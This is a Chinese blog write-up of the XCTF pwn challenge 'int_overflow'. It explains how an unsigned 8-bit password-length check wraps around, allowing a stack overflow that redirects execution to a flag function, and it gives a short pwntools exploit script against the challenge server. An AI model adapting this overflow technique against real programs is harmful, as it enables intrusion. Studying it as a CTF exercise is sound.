攻防世界-int overflow复现

最新推荐文章于 2024-03-11 15:27:20 发布
最新推荐文章于 2024-03-11 15:27:20 发布
阅读量468 收藏
点赞数
分类专栏: PWN学习篇 pwn复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/ConlinderFeng/article/details/109554124
版权

使用checksec 扫描,开启了NX。是一个32位的程序。
在这里插入图片描述
使用ida打开,main函数里面选1进入login。
在这里插入图片描述
在这里插入图片描述
进入check_passwd。
在这里插入图片描述
我们发现了v3 是 unsigned _int8 类型,其范围为0-255,而passwd可输入的长度为0x199(即409),可使v3发生整数溢出。
结合栈溢出可写出如下脚本。

from pwn import *
e.remote('111.198.29.45',41425)
flag_addr = 0x0804868B 
payload = 0x18*'a'+p32(flag_addr)+(256-0x18-4)*'a'+4*'a'
e.sendlineafter("Your choice:","1")
e.sendlineafter("Please input your username:","Sakura")
e.sendlineafter("Please input your passwd:",payload)
e.interactive()
叶叶扁舟
关注
专栏目录
攻防世界 int_overflow
09-28 759
1.题目 2.IDA反汇编C程序 3.流程分析 首先,选择login或者退出,选择login,则输入名字和密码,然后校验密码长度,长度小于等于3或者大于8等密码错误,否则成功。 但是看到这里,会有疑问,成功了之后呢?flag呢?在IDA的function view查找,发现一个函数what_is_this。一个存在于原函数但是我们程序流程里面没有调用过的函数。于是思路立马清晰了。我们需要通过栈溢出来覆盖返回地址,将函数what_is_this的地址覆盖到返回地址上。 接..
攻防世界pwn-int_overflow
a_silly_coder的博客
05-14 285
下载文件后首先检查保护,发现不存在canary,可以进行栈溢出。 将文件拖入ida32位进行查看,发现是一个简单的登录。 首先在login()中输入账号和密码,发现passwd存在buf中,可输入长度有0x199,然后传入check_passwd()函数中。 然后在check_passwd中将0x199长度的buf复制给dest,但是dest距离ebp只有0x14,我们也在文件中发现了cat flag的函数,所以思路就很清晰了,在输入密码时,输入一个长字符串,在check_passwd函数..
攻防世界-int_overflow
qq_45771413的博客
04-27 308
查看保护 IDA 先查看字符串搜索下有无可利用字符串,找到了cat flag。进入发现直接是system cat flag。看来只需要跳转到这个地址就可以了(0x8048694) 开始只能选择1.login登录,进入后提示输入用户名和密码。这里用户名限制死25位,没有操作空间,密码可以输入409位,插个眼。 最后还有个check passwd函数: 判断输入函数长度是否大于3小于8 然后将输入的密码拷贝给dest。 题目提示int_overstack,明晃晃地告诉我是整型溢出。我的关注重点就放在in
攻防世界 新手区 int_overflow
winterze的博客
04-04 353
攻防世界 新手区 整数溢出 0x00 函数分析 基本信息 [*] '/home/ububtu/ctf/int_overflow' Arch: i386-32-little RELRO: Partial RELRO Stack: No canary found NX: NX enabled PIE: No PIE (0...
【HUST】网络攻防实践|5_二进制文件补丁技术|实验一 overflow
qq_46106285的博客
06-03 1234
记录。使用IDA Pro打补丁修补逻辑漏洞和栈溢出漏洞。
攻防世界Training-Stegano-1
10-31
【标题】"攻防世界Training-Stegano-1" 是一个关于信息安全领域的训练题目,主要涉及的是隐写术(Steganography)技术。隐写术是一种隐藏信息的技术,通常用于在图像、音频或文本中嵌入秘密数据,使得非授权者无法...
攻防世界Erik-Baleog-and-Olaf
10-31
攻防世界Erik-Baleog-and-Olaf,misc。 此题详细解题博客:https://blog.csdn.net/m0_59188912/article/details/127615829
攻防世界-misc-arrdeepee
最新发布
苏生要努力
03-11 1274
题目:我们某一个box被pwn了。在检查过程中,我们发现了一个叫mimikatz的东西,我们以前没有安装过,所以我们清除了,并且重新安装了box。但是安装太麻烦了,除了需要解决openssl 1.0.2和1.1.0+的兼容性问题,还涉及到cmake安装时ffmpeg等各种库的版本问题,回头下载一个2016.2版本的Kali试试看能否正常安装。然后过滤tls协议,可以看到解密后的流量中出现了RDP和TPKT协议。需要输入密码,题目里给出了一个目前没有用到的信息mimikatz,尝试作为密码,成功提取出密钥。
制作酷炫樱花效果
weixin_46409887的博客
04-29 1956
效果图 代码如下: <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <title>Title</title> <style> body { padding:0; ...
overflow: hidden; 如何隐藏上面部分
12-26
overflow: hidden; 如何隐藏上面部分的实现方式 纯html代码,举例说明思路 <div style="width: 100px;height:100px;overflow:auto"> <div>1</div> <div>2</div> <div>3</div> <div>4</div> <div>5</div> <div>6</div> </div>
樱花特效.html
07-01
前端插件之樱花特效,利用h5+JavaScript实现,可更改实现樱花下落速度以及背景图片
gson序列化抛出StackOverflowError异常
浅醉樱花雨的专栏
10-16 4971
问题描述 使用gson库将实体对象序列化为json字符串时,出现StackOverflowError异常。如图: 经过排查,发现问题出在循环依赖上。简化版示例代码如下 public class A { private String name; private B b; public A(String name) { this.b = new B(this); this.name ...
css overflow
上善若水
06-01 1435
overflow:{1,2}  = visible | hidden | scroll | auto 默认值:visible 取值: visible:不剪切内容。hidden:将超出对象尺寸的内容进行裁剪,将不出现滚动条。scroll:将超出对象尺寸的内容进行裁剪,并以滚动条的方式显示超出的内容。auto:在需要时剪切内容并添加滚动条,此为body对象和textar
深入理解之overflow属性(第五期)
奔跑的面条博客
03-19 1万+
一、overflow特征 overflow-x:hidden;/ overflow-y:hidden;,当一方被隐藏的时候,另一方会自动变成visible; IE7浏览器下,文字越多的时候,按钮两侧的padding空白会越大。解决方法:给所有按钮添加overflow:visible; 二、overflow与滚动条 无论什么浏览器,默认滚动条来自于HTML,而不是body。 body/html...
深入理解CSS溢出overflow
weixin_33950035的博客
03-18 1065
前面的话   当一个元素固定为某个特定大小,但内容在元素中放不下。此时就可以利用overflow属性来控制这种情况   定义 overflow溢出   值: visible | hidden | scroll | auto | inherit   初始值: visible   应用于: 块级元素、替换元素、表单元格   继承性: 无   [注意]除了IE7-浏览器外,其他浏览器...
overflow属性,此溢出非彼溢出
qq_42526440的博客
08-15 3875
页面上的每个元素都是一个盒子。如果没有设置盒子的高度,那么盒子的高度将随着所需的内容的增大而变大。 overflow属性有四个值:visible(默认值),scroll,hidden和auto。 scroll值能阻止内容溢出,但会增加出滚动条,通过拉动滚动条可以浏览所有内容。 auto - 如果内容溢出被限制,则会添加一个滚动条,使超出的内容可以通过滚动展示出来。 hidden - 隐藏掉内容溢出...
CSS overflow 溢出
热门推荐
houyanhua1的专栏
10-30 12万+
new document div{ width:300px; height:200px; border:1px solid green; overflow:hidden;} /* overflow溢出,hidden隐藏,scroll滚动条,auto自动 */ 生活没有彩排,人生也没有彩排。 总会有些时候,满心期待换来的是失望,或者是
攻防世界pwn int_overflow writeup
PLpa的博客
07-07 1861
这是一道整数溢出题 我们知道,整数溢出本身不一定会对程序造成很大的伤害,但是他会造成其他形式的溢出,从而也十分的危险。 拿到题目,我们首先查看一下源代码的保护情况: 从上图可以看出,这是一个32位的程序,并且只开了堆栈不可执行的保护。 我们使用IDA查看一下源码: 我们进入这个check_passwd函数: 当v3>3u且v3<8u时,我们可以进入下面的else中。 else中把...
攻防世界-baby_web详解
12-21
根据提供的引用内容,攻防世界-baby_web是一个需要进行攻击和防御的网络应用。根据引用和引用[2]的描述,可以看出该应用存在注入漏洞,并且使用了一些安全措施来防止攻击者利用这些漏洞。攻击者可以通过注入恶意代码...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

叶叶扁舟

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值